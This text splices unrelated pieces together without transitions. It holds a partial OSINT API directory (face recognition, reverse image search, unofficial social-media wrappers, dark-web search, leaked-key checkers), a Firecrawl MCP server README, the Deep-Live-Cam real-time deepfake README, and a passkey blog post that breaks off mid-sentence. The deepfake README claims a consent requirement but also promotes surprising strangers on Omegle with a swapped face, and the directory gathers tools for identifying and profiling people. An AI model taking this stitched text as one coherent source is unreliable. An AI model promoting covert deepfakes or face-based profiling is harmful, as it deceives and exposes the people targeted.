Face++ | https://www.faceplusplus.com/face-detection/ | Detect and locate human faces within an image, and return high-precision face bounding boxes. Face++ also allows you to store metadata of each detected face for future use. | from 0.03 per call
BetaFace | https://www.betafaceapi.com/wpa/ | Can scan uploaded image files or image URLs, find faces and analyze them. API also provides verification (faces comparison) and identification (faces search) services, as well able to maintain multiple user-defined recognition databases (namespaces) | 50 image per day FREE/from 0.15 EUR per request |
## Reverse Image Search
Name | Link | Description | Price |
---|---|---|---|
Google Reverse images search API | https://github.com/SOME-1HING/google-reverse-image-api/ | This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. | FREE (UNOFFICIAL) |
TinEyeAPI | https://services.tineye.com/TinEyeAPI | Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image | Start from $200/5000 searches |
Bing Images Search API | https://www.microsoft.com/en-us/bing/apis/bing-image-search-api | With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. | 1,000 requests free per month FREE |
MRISA | https://github.com/vivithemage/mrisa | MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results | FREE (unofficial)
PicImageSearch | https://github.com/kitUIN/PicImageSearch | Aggregator for different Reverse Image Search APIs | FREE (unofficial)
## AI Geolocation
Name | Link | Description | Price |
---|---|---|---|
Geospy | https://api.geospy.ai/ | Estimate the location where an uploaded photo was taken | Access by request
Picarta | https://picarta.ai/api | Estimate the location where an uploaded photo was taken | 100 requests/day FREE
Name | Link | Description | Price |
---|---|---|---|
Twitch | https://dev.twitch.tv/docs/v5/reference | ||
YouTube Data API | https://developers.google.com/youtube/v3 | ||
Reddit | https://www.reddit.com/dev/api/ ||
Vkontakte | https://vk.com/dev/methods | ||
Twitter API | https://developer.twitter.com/en | ||
Linkedin API | https://docs.microsoft.com/en-us/linkedin/ | ||
All Facebook and Instagram API | https://developers.facebook.com/docs/ | ||
Whatsapp Business API | https://www.whatsapp.com/business/api | ||
Telegram and Telegram Bot API | https://core.telegram.org | ||
Weibo API | https://open.weibo.com/wiki/API文档/en | ||
Xing | https://dev.xing.com/partners/job_integration/api_docs ||
Viber | https://developers.viber.com/docs/api/rest-bot-api/ | ||
Discord | https://discord.com/developers/docs | ||
Odnoklassniki | https://ok.ru/apiok | ||
Blogger | https://developers.google.com/blogger/ | The Blogger APIs allows client applications to view and update Blogger content | FREE |
Disqus | https://disqus.com/api/docs/auth/ | Communicate with Disqus data | FREE |
Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) | FREE |
HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, Social Plugins and more | FREE |
Line | https://developers.line.biz/ | Line Login, Share on Line, Social Plugins and more | FREE |
TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and user's video posts on TikTok platform | FREE |
Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr Data | FREE |
WARNING: Use with caution! Accounts may be blocked permanently for using unofficial APIs.
Name | Link | Description | Price |
---|---|---|---|
TikTok | https://github.com/davidteather/TikTok-Api | The Unofficial TikTok API Wrapper In Python | FREE |
Google Trends | https://github.com/suryasev/unofficial-google-trends-api | Unofficial Google Trends API | FREE |
YouTube Music | https://github.com/sigma67/ytmusicapi | Unofficial APi for YouTube Music | FREE |
Duolingo | https://github.com/KartikTalwar/Duolingo | Duolingo unofficial API (can gather info about users) | FREE |
Steam | https://github.com/smiley/steamapi | An unofficial object-oriented Python library for accessing the Steam Web API. | FREE
Instagram | https://github.com/ping/instagram_private_api | Instagram Private API | FREE
Discord | https://github.com/discordjs/discord.js | JavaScript library for interacting with the Discord API | FREE |
Zhihu | https://github.com/syaning/zhihu-api | Unofficial API for Zhihu | FREE
Quora | https://github.com/csu/quora-api | Unofficial API for Quora | FREE |
DNSDumpster | https://github.com/PaulSec/API-dnsdumpster.com | (Unofficial) Python API for DNSDumpster | FREE
PornHub | https://github.com/sskender/pornhub-api | Unofficial API for PornHub in Python | FREE |
Skype | https://github.com/ShyykoSerhiy/skyweb | Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. | FREE |
Google Search | https://github.com/aviaryan/python-gsearch | Google Search unofficial API for Python with no external dependencies | FREE |
Airbnb | https://github.com/nderkach/airbnb-python | Python wrapper around the Airbnb API (unofficial) | FREE |
Medium | https://github.com/enginebai/PyMedium | Unofficial Medium Python Flask API and SDK | FREE |
Facebook | https://github.com/davidyen1124/Facebot | Powerful unofficial Facebook API | FREE
LinkedIn | https://github.com/tomquirk/linkedin-api | Unofficial LinkedIn API for Python | FREE
Y2mate | https://github.com/Simatwa/y2mate-api | Unofficial Y2mate API for Python | FREE |
Livescore | https://github.com/Simatwa/livescore-api | Unofficial Livescore API for Python | FREE |
Name | Link | Description | Price |
---|---|---|---|
Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
Serpstack | https://serpstack.com/ | Google search results to JSON | FREE |
Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bing and many other search engines' results | $50/5000 searches/month
Bing Web Search API | https://www.microsoft.com/en-us/bing/apis/bing-web-search-api | Search in Bing (+instant answers and location) | 1000 transactions per month FREE |
WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators and many more | from $25 per 1000 queries |
DuckDuckgo Instant Answers API | https://duckduckgo.com/api | An API for some of our Instant Answers, not for full search results. | FREE |
Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | API for the Marginalia privacy-focused search engine | FREE
Name | Link | Description | Price |
---|---|---|---|
MediaStack | https://mediastack.com/ | News articles search results in JSON | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Darksearch.io | https://darksearch.io/apidoc | Search websites in the .onion zone | FREE
Onion Lookup | https://onion.ail-project.org/ | onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on a private AIL instance to obtain the metadata | FREE
Name | Link | Description | Price |
---|---|---|---|
Jackett | https://github.com/Jackett/Jackett | API to automate searching across different torrent trackers | FREE
Torrents API PY | https://github.com/Jackett/Jackett | Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre | FREE |
Torrent Search API | https://github.com/Jackett/Jackett | API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt | 500 queries/day FREE |
Torrent search api | https://github.com/JimmyLaurent/torrent-search-api | Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) | FREE |
Torrentinim | https://github.com/sergiotapia/torrentinim | Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. | FREE |
Name | Link | Description | Price |
---|---|---|---|
National Vulnerability Database CVE Search API | https://nvd.nist.gov/developers/vulnerabilities | Get basic information about CVE and CVE history | FREE |
OpenCVE API | https://docs.opencve.io/api/cve/ | Get basic information about CVE | FREE |
CVEDetails API | https://www.cvedetails.com/documentation/apis | Get basic information about CVE | partly FREE (?) |
CVESearch API | https://docs.cvesearch.com/ | Get basic information about CVE | by request |
KEVin API | https://kevin.gtfkd.com/ | API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data | FREE |
Vulners.com API | https://vulners.com | Get basic information about CVE | FREE for personal use |
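For example, a single CVE record can be pulled from the NVD API listed above with nothing more than curl and jq (the CVE ID is arbitrary):

```bash
# Fetch one CVE from the NVD 2.0 API and print its English description.
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2021-44228" \
  | jq '.vulnerabilities[0].cve.descriptions[0].value'
```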
Name | Link | Description | Price |
---|---|---|---|
Aviation Stack | https://aviationstack.com | Get information about flights, aircraft and airlines | FREE
OpenSky Network | https://opensky-network.org/apidoc/index.html | Free real-time ADS-B aviation data | FREE |
AviationAPI | https://docs.aviationapi.com/ | FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather | FREE |
FachaAPI | https://api.facha.dev | Aircraft details and live positioning API | FREE |
Name | Link | Description | Price |
---|---|---|---|
Windy Webcams API | https://api.windy.com/webcams/docs | Get a list of available webcams for a country, city or geographical coordinates | FREE with limits or 9990 euro without limits |
## Regex
Name | Link | Description | Price |
---|---|---|---|
Autoregex | https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a | Convert English phrase to regular expression | from $3.49/month |
Name | Link |
---|---|
API Guessr (detect API by auth key or by token) | https://api-guesser.netlify.app/ |
REQBIN Online REST & SOAP API Testing Tool | https://reqbin.com |
ExtendClass Online REST Client | https://extendsclass.com/rest-client-online.html |
Codebeatify.org Online API Test | https://codebeautify.org/api-test |
SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Talend API Tester Google Chrome Extension | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Michael Bazzell APIs search tools | https://inteltechniques.com/tools/API.html
Name | Link |
---|---|
Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON | https://curlconverter.com |
Curl-to-PHP. Instantly convert curl commands to PHP code | https://incarnate.github.io/curl-to-php/ |
Curl to PHP online (Codebeatify) | https://codebeautify.org/curl-to-php-online |
Curl to JavaScript fetch | https://kigiri.github.io/fetch/ |
Curl to JavaScript fetch (Scrapingbee) | https://www.scrapingbee.com/curl-converter/javascript-fetch/ |
Curl to C# converter | https://curl.olsh.me |
Name | Link |
---|---|
Sheety. Create an API from a Google Sheet | https://sheety.co/
Postman. Platform for creating your own API | https://www.postman.com |
Retool. REST API Generator | https://retool.com/api-generator/
Beeceptor. REST API mocking and intercepting in seconds (no coding). | https://beeceptor.com
Name | Link |
---|---|
RapidAPI. Market your API to millions of developers | https://rapidapi.com/solution/api-provider/
Apilayer. API Marketplace | https://apilayer.com |
Name | Link | Description |
---|---|---|
Keyhacks | https://github.com/streaak/keyhacks | Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. |
All about APIKey | https://github.com/daffainfo/all-about-apikey | Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example) |
API Guessr | https://api-guesser.netlify.app/ | Enter an API key and find out which service it belongs to
Name | Link | Description |
---|---|---|
APIDOG ApiHub | https://apidog.com/apihub/ | |
Rapid APIs collection | https://rapidapi.com/collections | |
API Ninjas | https://api-ninjas.com/api | |
APIs Guru | https://apis.guru/ | |
APIs List | https://apislist.com/ | |
API Context Directory | https://apicontext.com/api-directory/ | |
Any API | https://any-api.com/ | |
Public APIs Github repo | https://github.com/public-apis/public-apis |
If you don't know how to work with REST APIs, I recommend checking out the Netlas API guide I wrote for Netlas.io.
It briefly and accessibly explains how to automate requests in different programming languages (with a focus on Python and Bash) and how to process the resulting JSON data.
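As a minimal illustration of that workflow in Bash, here is a sketch that calls the free ip-api.com endpoint listed above and extracts a few fields from the JSON with jq (the IP address is just an example):

```bash
# Query the free IP geolocation API and keep only a few fields of interest.
# Requires curl and jq to be installed.
curl -s "http://ip-api.com/json/8.8.8.8" | jq '{country, city, isp, org}'
```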
Thank you for following me! https://cybdetective.com
A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor 🖥️
Note: Requires Cursor version 0.45.6+. For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide.
To configure Firecrawl MCP in Cursor v0.45.6
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6
json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }
If you are using Windows and are running into issues, try
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
The server is configured via environment variables:

- FIRECRAWL_API_KEY: Your Firecrawl API key (required when using the cloud API)
- FIRECRAWL_API_URL (optional): Custom API endpoint for self-hosted instances, e.g. https://firecrawl.your-domain.com
- FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
- FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
- FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
- FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
- FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
- FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
Add this to your claude_desktop_config.json:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:

Retry Behavior
- Automatically retries requests that fail due to rate limits, using exponential backoff capped at the maximum delay.
- Example: with the default settings above, retries are attempted after roughly 1 second, 2 seconds and then 4 seconds (a minimal sketch of the arithmetic follows below).
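To make that schedule concrete, here's a small illustrative sketch in Python (not the server's actual code) of how an exponential backoff schedule like the one configured above is typically computed:

```python
def backoff_delays(max_attempts=3, initial_delay=1000, max_delay=10000, backoff_factor=2):
    """Yield the delay in milliseconds to wait before each retry attempt."""
    delay = initial_delay
    for _ in range(max_attempts):
        yield min(delay, max_delay)  # never wait longer than max_delay
        delay *= backoff_factor      # grow the delay exponentially

# With the defaults above: [1000, 2000, 4000] -> retries after ~1s, 2s and 4s
print(list(backoff_delays()))
```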
Credit Usage Monitoring
- Tracks API credit consumption against the warning and critical thresholds configured above.
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape: Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
firecrawl_batch_scrape: Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status: Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search: Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl: Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract: Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
- urls: Array of URLs to extract information from
- prompt: Custom prompt for the LLM extraction
- systemPrompt: System prompt to guide the LLM
- schema: JSON schema for structured data extraction
- allowExternalLinks: Allow extraction from external links
- enableWebSearch: Enable web search for additional context
- includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For the cloud API, it uses Firecrawl's managed LLM service.
firecrawl_deep_research: Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments: query (required), plus the optional maxDepth, timeLimit and maxUrls shown in the example above.
Returns: the final analysis produced once the research completes.
firecrawl_generate_llmstxt: Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments: url (required), plus the optional maxUrls and showFullText shown in the example above.
Returns: the generated llms.txt contents (and llms-full.txt when showFullText is enabled).
The server includes comprehensive logging. Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling. Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
MIT License - see LICENSE file for details
Real-time face swap and video deepfake with a single click and only a single image.
This deepfake software is designed to be a productive tool for the AI-generated media industry. It can assist artists in animating custom characters, creating engaging content, and even using models for clothing design.
We are aware of the potential for unethical applications and are committed to preventative measures. A built-in check prevents the program from processing inappropriate media (nudity, graphic content, sensitive material like war footage, etc.). We will continue to develop this project responsibly, adhering to the law and ethics. We may shut down the project or add watermarks if legally required.
Ethical Use: Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online.
Content Restrictions: The software includes built-in checks to prevent processing inappropriate media, such as nudity, graphic content, or sensitive material.
Legal Compliance: We adhere to all relevant laws and ethical guidelines. If legally required, we may shut down the project or add watermarks to the output.
User Responsibility: We are not responsible for end-user actions. Users must ensure their use of the software aligns with ethical standards and legal requirements.
By using this software, you agree to these terms and commit to using it in a manner that respects the rights and dignity of others.
1. Select a face
2. Select which camera to use
3. Press live!
Retain your original mouth for accurate movement using Mouth Mask
Use different faces on multiple subjects simultaneously
Watch movies with any face in real-time
Run Live shows and performances
Create Your Most Viral Meme Yet
Created using Many Faces feature in Deep-Live-Cam
Surprise people on Omegle
Please be aware that the installation requires technical skills and is not for beginners. Consider downloading the prebuilt version.
git clone https://github.com/hacksider/Deep-Live-Cam.git
cd Deep-Live-Cam
**3. Download the Models**

1. [GFPGANv1.4](https://huggingface.co/hacksider/deep-live-cam/resolve/main/GFPGANv1.4.pth)
2. [inswapper_128_fp16.onnx](https://huggingface.co/hacksider/deep-live-cam/resolve/main/inswapper_128_fp16.onnx)

Place these files in the "**models**" folder.

**4. Install Dependencies**

We highly recommend using a `venv` to avoid issues.

For Windows:

python -m venv venv
venv\Scripts\activate
pip install -r requirements.txt
**For macOS:**

Apple Silicon (M1/M2/M3) requires specific setup:

# Install Python 3.10 (specific version is important)
brew install python@3.10
# Install tkinter package (required for the GUI)
brew install python-tk@3.10
# Create and activate virtual environment with Python 3.10
python3.10 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
**In case something goes wrong and you need to reinstall the virtual environment**

# Deactivate the virtual environment
deactivate
rm -rf venv
# Reinstall the virtual environment
python -m venv venv
source venv/bin/activate
# install the dependencies again
pip install -r requirements.txt
**Run:**

If you don't have a GPU, you can run Deep-Live-Cam using `python run.py`. Note that initial execution will download models (~300MB).

### GPU Acceleration

**CUDA Execution Provider (Nvidia)**

1. Install [CUDA Toolkit 11.8.0](https://developer.nvidia.com/cuda-11-8-0-download-archive)
2. Install dependencies:

pip uninstall onnxruntime onnxruntime-gpu
pip install onnxruntime-gpu==1.16.3

3. Usage:

python run.py --execution-provider cuda

**CoreML Execution Provider (Apple Silicon)**

Apple Silicon (M1/M2/M3) specific installation:

1. Make sure you've completed the macOS setup above using Python 3.10.
2. Install dependencies:

pip uninstall onnxruntime onnxruntime-silicon
pip install onnxruntime-silicon==1.13.1

3. Usage (important: specify Python 3.10):

python3.10 run.py --execution-provider coreml

**Important Notes for macOS:**

- You **must** use Python 3.10, not newer versions like 3.11 or 3.13
- Always run with the `python3.10` command, not just `python`, if you have multiple Python versions installed
- If you get an error about `_tkinter` missing, reinstall the tkinter package: `brew reinstall python-tk@3.10`
- If you get model loading errors, check that your models are in the correct folder
- If you encounter conflicts with other Python versions, consider uninstalling them:

```bash
# List all installed Python versions
brew list | grep python

# Uninstall conflicting versions if needed
brew uninstall --ignore-dependencies python@3.11 python@3.13

# Keep only Python 3.10
brew cleanup
```

**CoreML Execution Provider (Apple Legacy)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-coreml
pip install onnxruntime-coreml==1.13.1

2. Usage:

python run.py --execution-provider coreml

**DirectML Execution Provider (Windows)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-directml
pip install onnxruntime-directml==1.15.1

2. Usage:

python run.py --execution-provider directml

**OpenVINO™ Execution Provider (Intel)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-openvino
pip install onnxruntime-openvino==1.15.0

2. Usage:

python run.py --execution-provider openvino
1. Image/Video Mode

python run.py

2. Webcam Mode

python run.py

Check out these helpful guides to get the most out of Deep-Live-Cam:
Visit our official blog for more tips and tutorials.
options:
-h, --help show this help message and exit
-s SOURCE_PATH, --source SOURCE_PATH select a source image
-t TARGET_PATH, --target TARGET_PATH select a target image or video
-o OUTPUT_PATH, --output OUTPUT_PATH select output file or directory
--frame-processor FRAME_PROCESSOR [FRAME_PROCESSOR ...] frame processors (choices: face_swapper, face_enhancer, ...)
--keep-fps keep original fps
--keep-audio keep original audio
--keep-frames keep temporary frames
--many-faces process every face
--map-faces map source target faces
--mouth-mask mask the mouth region
--video-encoder {libx264,libx265,libvpx-vp9} adjust output video encoder
--video-quality [0-51] adjust output video quality
--live-mirror the live camera display as you see it in the front-facing camera frame
--live-resizable the live camera frame is resizable
--max-memory MAX_MEMORY maximum amount of RAM in GB
--execution-provider {cpu} [{cpu} ...] available execution provider (choices: cpu, ...)
--execution-threads EXECUTION_THREADS number of execution threads
-v, --version show program's version number and exit
Looking for a CLI mode? Using the -s/--source argument will make the program run in CLI mode.
We are always open to criticism and are ready to improve, that's why we didn't cherry-pick anything.
Let me start by very simply explaining the problem we're trying to solve with passkeys. Imagine you're logging on to a website like this:
And, because you want to protect your account from being logged into by someone else who may obtain your username and password, you've turned on two-factor authentication (2FA). That means that even after entering the correct credentials in the screen above, you're now prompted to enter the six-digit code from your authenticator app:
There are a few different authenticator apps out there, but what they all have in common is that they display a one-time password (henceforth referred to as an OTP) with a countdown timer next to it:
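If you're curious about what's going on under the hood, the code is just a hash of a shared secret and the current time, truncated to six digits, which is why it rolls over every 30 seconds. Here's a minimal sketch using Python's pyotp library with a made-up secret (your authenticator stores the real one when you scan the QR code):

```python
import pyotp

# A made-up base32 secret; the real one is embedded in the QR code you scan
secret = "JBSWY3DPEHPK3PXP"
totp = pyotp.TOTP(secret)  # six digits, 30-second window by default

print(totp.now())             # the same code an authenticator app would show right now
print(totp.verify("123456"))  # False unless that code is valid in the current window
```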
By only being valid for a short period of time, if someone else obtains the OTP then they have a very short window in which it's valid. Besides, who can possibly obtain it from your authenticator app anyway?! Well... that's where the problem lies, and I demonstrated this just recently, not intentionally, but rather entirely by accident when I fell victim to a phishing attack. Here's how it worked:
The problem with OTPs from authenticator apps (or sent via SMS) is that they're phishable in that it's possible for someone to trick you into handing one over. What we need instead is a "phishing-resistant" paradigm, and that's precisely what passkeys are. Let's look at how to set them up, how to use them on websites and in mobile apps, and talk about what some of their shortcomings are.
We'll start by setting one up for WhatsApp given I got a friendly prompt from them to do this recently:
So, let's "Try it" and walk through the mechanics of what it means to setup a passkey. I'm using an iPhone, and this is the screen I'm first presented with:
A passkey is simply a digital file you store on your device. It has various cryptographic protections in the way it is created and then used to login, but that goes beyond the scope of what I want to explain to the audience in this blog post. Let's touch briefly on the three items WhatsApp describes above:
That last point can be very device-specific and very user-specific. Because I have an iPhone, WhatsApp is suggesting I save the passkey into my iCloud Keychain. If you have an Android, you're obviously going to see a different message that aligns to how Google syncs passkeys. Choosing one of these native options is your path of least resistance - a couple of clicks and you're done. However...
I have lots of other services I want to use passkeys on, and I want to authenticate to them both from my iPhone and my Windows PC. For example, I use LinkedIn across all my devices, so I don't want my passkey tied solely to my iPhone. (It's a bit clunky, but some services enable this by using the mobile device your passkey is on to scan a QR code displayed on a web page). And what if one day I switch from iPhone to Android? I'd like my passkeys to be more transferable, so I'm going to store them in my dedicated password manager, 1Password.
A quick side note: as you'll read in this post, passkeys do not necessarily replace passwords. Sometimes they can be used as a "single factor" (the only thing you use to login with), but they may also be used as a "second factor" with the first being your password. This is up to the service implementing them, and one of the criticisms of passkeys is that your experience with them will differ between websites.
We still need passwords, we still want them to be strong and unique, therefore we still need password managers. I've been using 1Password for 14 years now (full disclosure: they sponsor Have I Been Pwned, and often sponsor this blog too) and as well as storing passwords (and credit cards and passport info and secure notes and sharing it all with my family), they can also store passkeys. I have 1Password installed on my iPhone and set as the default app to autofill passwords and passkeys:
Because of this, I'm given the option to store my WhatsApp passkey directly there:
The obfuscated section is the last four digits of my phone number. Let's "Continue", and then 1Password pops up with a "Save" button:
Once saved, WhatsApp displays the passkey that is now saved against my account:
And because I saved it into 1Password that syncs across all my devices, I can jump over to the PC and see it there too.
And that's it, I now have a passkey for WhatsApp which can be used to log in. I picked this example as a starting point given the massive breadth of the platform and the fact I was literally just prompted to create a passkey (the very day my Mailchimp account was phished, ironically). Only thing is, I genuinely can't see how to log out of WhatsApp so I can then test using the passkey to log in. Let's go and create another with a different service and see how that experience differs.
Let's pick another example, and we'll set this one up on my PC. I'm going to pick a service that contains some important personal information, which would be damaging if it were taken over. In this case, the service has also previously suffered a data breach themselves: LinkedIn.
I already had two-step verification enabled on LinkedIn, but as evidenced in my own phishing experience, this isn't always enough. (Note: the terms "two-step", "two-factor" and "multi-factor" do have subtle differences, but for the sake of simplicity, I'll treat them as interchangeable terms in this post.)
Onto passkeys, and you'll see similarities between LinkedIn's and WhatsApp's descriptions. An important difference, however, is LinkedIn's comment about not needing to remember complex passwords:
